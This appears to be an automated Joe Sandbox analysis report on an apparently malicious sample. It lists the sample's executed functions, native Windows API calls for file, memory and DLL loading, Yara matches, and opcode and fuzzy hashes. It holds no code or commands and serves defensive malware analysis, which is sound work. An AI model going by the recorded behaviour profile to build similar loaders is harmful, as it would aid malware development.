f82ca0 LdrInitializeThunk 99889->99894 99890->99889 99891 40cf8f 99891->99881 99893 41a7e0 LdrLoadDll 99891->99893 99893->99885 99894->99891 99896 41af30 LdrLoadDll 99895->99896 99897 41a56c 99896->99897 99900 f82f90 LdrInitializeThunk 99897->99900 99898 419b99 99898->99855 99898->99858 99900->99898 99902 408328 99901->99902 99903 40acf0 LdrLoadDll 99902->99903 99904 408343 99903->99904 99905 414e50 LdrLoadDll 99904->99905 99906 408353 99905->99906 99907 40835c PostThreadMessageW 99906->99907 99908 408370 99906->99908 99907->99908 99908->99828 99910 40f683 99909->99910 99916 419e60 99910->99916 99914 41af30 LdrLoadDll 99913->99914 99915 419d3c 99914->99915 99915->99836 99917 419e7c 99916->99917 99918 41af30 LdrLoadDll 99916->99918 99921 f82dd0 LdrInitializeThunk 99917->99921 99918->99917 99919 40f6ae 99919->99828 99921->99919 99922->99759 99924 419fa6 99923->99924 99925 41af30 LdrLoadDll 99924->99925 99926 419fac 99925->99926 99929 f82f30 LdrInitializeThunk 99926->99929 99927 40f4fe 99927->99765 99927->99766 99929->99927 99930->99771 99931->99776 99932->99781 99935 f82ad0 LdrInitializeThunk

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 0041A3DA Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 0 41a3da-41a429 call 41af30 NtReadFile
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                      • String ID: 1JA$rMA$rMA
                                                                                                                                                                                                                      • API String ID: 2738559852-782607585
                                                                                                                                                                                                                      • Opcode ID: 757b6e1bc07b3bf09793faee9661551754b0ff6aec0333777d77dda8410c520e
                                                                                                                                                                                                                      • Instruction ID: d9496cab67eccaa2a300e7c2e8500b7217d72c9056333dd282b08d57620d7ac6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 757b6e1bc07b3bf09793faee9661551754b0ff6aec0333777d77dda8410c520e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87F01DB2210148ABCB05DF98D890CEB7BADAF8C314B15869DFD0C97216C634E855CBA0
                                                                                                                                                                                                                      Function 0041A3E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 3 41a3e0-41a3f6 4 41a3fc-41a429 NtReadFile 3->4 5 41a3f7 call 41af30 3->5 5->4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                      • String ID: 1JA$rMA$rMA
                                                                                                                                                                                                                      • API String ID: 2738559852-782607585
                                                                                                                                                                                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                                                      • Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                                                                                                                                                                                      Function 0041A2EA Relevance: 1.6, APIs: 1, Instructions: 66filenativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 204 41a2ea-41a2ee 205 41a2f0-41a329 call 41af30 204->205 206 41a338-41a381 call 41af30 NtCreateFile 204->206
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                      • Opcode ID: 94b546fadc3172d4cbd0974d002435d2c170b5460e604780f875a3b40548b332
                                                                                                                                                                                                                      • Instruction ID: 7d927b91c53d99ff772232a7bee72b09811667c0becba63b72a30f99829caa9b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94b546fadc3172d4cbd0974d002435d2c170b5460e604780f875a3b40548b332
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE1107B2215209ABCB08DF98DC85DEB77ADAF8C314F05824DFA4DA7241C630E851CBA4
                                                                                                                                                                                                                      Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 227 40acf0-40ad0c 228 40ad14-40ad19 227->228 229 40ad0f call 41cc20 227->229 230 40ad1b-40ad1e 228->230 231 40ad1f-40ad2d call 41d040 228->231 229->228 234 40ad3d-40ad4e call 41b470 231->234 235 40ad2f-40ad3a call 41d2c0 231->235 240 40ad50-40ad64 LdrLoadDll 234->240 241 40ad67-40ad6a 234->241 235->234 240->241
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Load
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                                                                                      • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                                                                                      • Instruction ID: 667dcf47c4413345b20473d406be44d3d8b7ebea9a3b2269cd40777f9644ce6e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79015EB5D0020DBBDB10EBA1DC42FDEB3799F54308F0045AAA908A7281F638EB54CB95
                                                                                                                                                                                                                      Function 0041A32A Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 251 41a32a-41a346 252 41a34c-41a381 NtCreateFile 251->252 253 41a347 call 41af30 251->253 253->252
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                      • Opcode ID: ee3695a4899577ce3d874c1ef7f2278fb65b84fc6352f54c306a385979961bef
                                                                                                                                                                                                                      • Instruction ID: 24e128ae343006bbbc751a00b5729f9aa9b5416c578219d56ac147f4e2306034
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee3695a4899577ce3d874c1ef7f2278fb65b84fc6352f54c306a385979961bef
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4201B2B2251208AFCB08CF88DC95EEB77ADAF8C754F558248FA1D97245D630E851CBA4
                                                                                                                                                                                                                      Function 0041A330 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 254 41a330-41a346 255 41a34c-41a381 NtCreateFile 254->255 256 41a347 call 41af30 254->256 256->255
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                                                      • Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4
                                                                                                                                                                                                                      Function 0041A50A Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 257 41a50a-41a54d call 41af30 NtAllocateVirtualMemory
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                                                                                      • Opcode ID: 78230f0ff9201d4745c2d2b452e3fe21bc602f113a9ce9da4f9caed57fd84e58
                                                                                                                                                                                                                      • Instruction ID: 3214efd615eb7748cce34c0857b00ece96d2b0a482458fe4319a666bc9c2efb0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78230f0ff9201d4745c2d2b452e3fe21bc602f113a9ce9da4f9caed57fd84e58
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBF05EB6210104AFDB14CF88CC80EE77B69AF8C314F158549FE489B241C230E811CFA0
                                                                                                                                                                                                                      Function 0041A510 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 260 41a510-41a526 261 41a52c-41a54d NtAllocateVirtualMemory 260->261 262 41a527 call 41af30 260->262 262->261
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                                                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                                      • Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                                                                                                                                                                                      Function 0041A45E Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                                                                                      • Opcode ID: 25e6b8735553a4378f13bb0ccfcbc3dfc71a3b5083118c10cb058ef1580ccd1c
                                                                                                                                                                                                                      • Instruction ID: 5c9da78348f1c9ef571b357f18b9320631ab7668477cfade35412350ce0ea39f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25e6b8735553a4378f13bb0ccfcbc3dfc71a3b5083118c10cb058ef1580ccd1c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2E0C272200204BFD720EFA4CC45EDB7B68EF44364F104459F90EAB242C130E511CB90
                                                                                                                                                                                                                      Function 0041A460 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                                                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                                      • Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0
                                                                                                                                                                                                                      Function 00F82AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: d4da76cf9d892bea879f9f6f9a798bf319f2add36b99dd78171643a01150901a
                                                                                                                                                                                                                      • Instruction ID: 0a3a999c0ec8d306c2b0f083042b923fb4d545934adedd72f7b1732b0b91d56d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4da76cf9d892bea879f9f6f9a798bf319f2add36b99dd78171643a01150901a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93900225211400131605B5584704507004687D6391355C032F1019550DDA2589626125
                                                                                                                                                                                                                      Function 00F82BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 6b9560696ced4ec965a62be01503a61076cbb917b64907e369351a0b33eadf24
                                                                                                                                                                                                                      • Instruction ID: 7c14024ed2ef89a6c2741be04807717f535dfc4aa9325e3d1a49f954e4b7cb9e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b9560696ced4ec965a62be01503a61076cbb917b64907e369351a0b33eadf24
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3390023120140812E6807158840464A000587D2341F95C026A0029654ECE198B5A77A5
                                                                                                                                                                                                                      Function 00F82B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 441f77228d1197e61000e0cc8c63192e2824b5d5ba03b21552eb8c4447c15d38
                                                                                                                                                                                                                      • Instruction ID: a3efc0f309478cce6d7776b941e2c2e79bb64630ca5fcc1859ab5446641a9763
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 441f77228d1197e61000e0cc8c63192e2824b5d5ba03b21552eb8c4447c15d38
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B90026120240013560571588414616400A87E1341B55C032E1018590EC92989927129
                                                                                                                                                                                                                      Function 00F82CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 3214b5800cc7f62179507d8b585f32b11b9517f8611765659c2aec4ef484b805
                                                                                                                                                                                                                      • Instruction ID: 8fa83b782a88d52084fe667b60cf4cfa94d519e13fd1c9651e8344c946f06aff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3214b5800cc7f62179507d8b585f32b11b9517f8611765659c2aec4ef484b805
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3290023120140412E60075989408646000587E1341F55D022A5028555FCA6989927135
                                                                                                                                                                                                                      Function 00F82C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 8f6125bbfda9ff7877326b1a5227a07460be57975506bd5448640b2ce7a592c6
                                                                                                                                                                                                                      • Instruction ID: 1b795bba94f4159031ab2cb7ac2b3153a339210e5ff17b78a2b3f16fc5a5c20e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f6125bbfda9ff7877326b1a5227a07460be57975506bd5448640b2ce7a592c6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C90023120148812E6107158C40474A000587D1341F59C422A4428658E8A9989927125
                                                                                                                                                                                                                      Function 00F82DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 140d1b940f640b88caab6d9876f3cca74ad7f507a8cdca40f0da607cfdf1ea36
                                                                                                                                                                                                                      • Instruction ID: 9a0c3bd3a76b6d1e499344bbe31e52bd22553f02bb51321b60ce05f6bb2f3c61
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 140d1b940f640b88caab6d9876f3cca74ad7f507a8cdca40f0da607cfdf1ea36
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3190023120140423E61171588504707000987D1381F95C423A0428558E9A5A8A53B125
                                                                                                                                                                                                                      Function 00F82DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: cce8d4d470f396274ff64014ff4391cf3d5de8812f713d78b66203341a4a910a
                                                                                                                                                                                                                      • Instruction ID: ec6ce89444962927fd62c6b8174f0b7136650e5abffb38309640daeedb409011
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cce8d4d470f396274ff64014ff4391cf3d5de8812f713d78b66203341a4a910a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B900221242441626A45B1588404507400697E1381795C023A1418950D892A9957E625
                                                                                                                                                                                                                      Function 00F82D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 5f2ba4d4a784a239ade3f22f96db52b4e3ae6444c58fff9bab709faefa48c6c0
                                                                                                                                                                                                                      • Instruction ID: 7fbe8c7429afbb294570d08b81edc02588f738e5718cc37259141fbdda040aa2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f2ba4d4a784a239ade3f22f96db52b4e3ae6444c58fff9bab709faefa48c6c0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E190022130140013E640715894186064005D7E2341F55D022E0418554DDD1989576226
                                                                                                                                                                                                                      Function 00F82D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 60ed9ade43182fa001fbfa5a5a60bc594ea61892f31e01ce253290c628a76b2c
